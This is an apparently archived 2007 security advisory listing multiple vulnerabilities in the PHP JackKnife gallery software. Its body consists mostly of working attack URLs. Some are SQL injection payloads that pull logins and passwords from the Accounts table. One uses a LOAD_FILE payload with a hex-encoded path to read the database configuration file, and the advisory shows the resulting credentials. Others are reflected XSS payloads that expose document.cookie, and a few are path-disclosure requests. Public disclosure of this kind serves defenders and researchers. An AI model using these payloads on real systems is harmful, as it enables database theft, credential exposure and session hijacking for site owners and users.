PHP JackKnife [multiple vulnerabilities]

2007-06-06 / 2007-06-07
Credit: laurent gaffie
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-3002 | CVE-2007-3001 | CVE-2007-3000
CWE: N/A

Vendor site: http://www.phpjk.com/ Product: phpjackknife Bug: sql injection , xss , full path Risk: high Note: works regarless of php.ini settings Description: PHP JackKnife (PHPJK) is freely downloadable PHP gallery software that you can use to instantly create you own online web gallery Injection sql GET : http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/ **/1,2,Password,4,5,6/**/from/**/Accounts/* http://127.0.0.1/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID= -1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/* Read database credentials: http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/ **/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5 048504A4B2F436F6E66696775726174696F6E732F5048504A4B5F436F6E6669672E70687 0),4,5,6/**/from/**/Accounts/* //Result (in the page source code) : $sUseDB = "MYSQL"; $sDatabaseName = "phpjk"; $sDatabaseServer = "localhost"; $sDatabaseLogin = "my_user"; $sDatabasePassword = "my_password"; ps:( 0x2F75......... = /usr/local/apache2/htdocs/PHPJK/Configurations/PHPJK_Config.php ) Xss get : http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq=</textarea>'"><script> alert(document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?iDBLoc=</textarea>'"><script>alert( document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?iTtlNumItems=</textarea>'"><script> alert(document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?&iNumPerPage=</textarea>'"><script> alert(document.cookie)</script> http://127.0.0.1/PHPJK/G_Display.php?sSort=</textarea>'"><script>alert(d ocument.cookie)</script> http://127.0.0.1/PHPJK/UserArea/Authenticate.php?sUName=</textarea>'"><s cript>alert(document.cookie)</script> http://127.0.0.1/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=</text area>'"><script>alert(document.cookie)</script> Full path : http://127.0.0.1/PHPJK/G_Display.php?iCategoryUnq[]=1 http://127.0.0.1/PHPJK/G_Display.php?sSort[]=Name_A http://127.0.0.1/PHPJK/index.php?iParentUnq[]=0 regards laurent gaffie contact: laurent.gaffie (at) gmail (dot) com [email concealed]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top